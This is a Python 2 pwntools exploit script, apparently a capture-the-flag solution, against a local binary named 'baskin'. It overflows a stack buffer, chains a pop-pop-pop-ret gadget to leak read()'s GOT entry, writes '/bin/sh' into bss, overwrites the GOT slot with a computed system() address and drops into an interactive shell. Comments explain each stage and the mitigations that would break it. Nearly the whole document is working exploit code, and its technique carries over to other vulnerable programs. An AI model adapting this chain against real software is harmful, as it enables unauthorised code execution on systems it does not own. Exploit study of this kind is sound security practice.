exploit.py


from pwn import *


# Python 2 pwntools script (print statement, str payloads): the "A"*... str
# is concatenated with p64() output, which under Python 3 would be bytes and
# raise TypeError, so this file is not portable as written.
# From a hardening standpoint, every step below depends on fixed absolute
# addresses and a writable GOT; PIE, full RELRO and a stack canary are the
# standard mitigations that each break a different stage of this chain.
p = process("./baskin")


# Absolute addresses for this specific non-PIE build; they are only valid for
# this exact binary (a PIE build would randomize them on every run).
write_plt = 0x4006d0

pppr = 0x40087a   # by its name a pop;pop;pop;ret gadget; used to set rdi/rsi/rdx before each call

read_plt = 0x400700

read_got = 0x602040   # GOT slot for read(): leaked in stage 1, overwritten in stage 3

bss = 0x0000000000602090   # writable scratch area where binsh is stored

# Difference of two runtime addresses observed in one particular libc; it is
# subtracted from the leaked value below, so it is valid only for that libc
# build and must be recomputed for any other environment.
distance = 0x7f01512ac070 - 0x7f01511eb440

binsh="/bin/sh\x00"


# Padding up to the saved return address: presumably a 0xb0-byte buffer plus
# the 8-byte saved rbp — confirm against the binary's stack frame.
payload = "A"*(0xb0+8)

# Stage 1: write(1, read_got, 8) — prints the 8-byte GOT entry of read() to stdout.
payload += p64(pppr)

payload += p64(1)

payload += p64(read_got)

payload += p64(8)

payload += p64(write_plt)


# Stage 2: read(0, bss, len(binsh)) — stores the string sent as binsh below at bss.
payload += p64(pppr)

payload += p64(0)

payload += p64(bss)

payload += p64(len(binsh))

payload += p64(read_plt)


# Stage 3: read(0, read_got, 8) — replaces the GOT entry of read() with the
# 8 bytes sent as system below. Full RELRO would make this slot read-only.
payload += p64(pppr)

payload += p64(0)

payload += p64(read_got)

payload += p64(8)

payload += p64(read_plt)


# Stage 4: call read_plt again with rdi = bss; after stage 3 the PLT stub jumps
# to whatever address was written into read_got, with bss as first argument.
# The 16 filler bytes occupy the rsi/rdx slots, whose values are unused here.
payload += p64(pppr)

payload += p64(bss)

payload += "A"*16

payload += p64(read_plt)


# Wait for the menu prompt before sending the overflow.
print p.recvuntil("(1-3)\n")


p.sendline(payload)

# The chain starts running once the program prints this line.
print p.recvuntil("Don't break the rules...:( \n")


# Stage 1 output: the leaked 8-byte address of read() in the live libc.
read = u64(p.recv(8))

# Target address derived from the leak and the hard-coded libc offset above.
system = p64(read-distance)

# Stage 2 input.
p.send(binsh)

# Small delay so the two reads are not coalesced into a single input read.
sleep(0.5)

# Stage 3 input: sendline appends '\n', but the read only consumes 8 bytes,
# so the newline stays buffered on stdin.
p.sendline(system)

p.interactive()

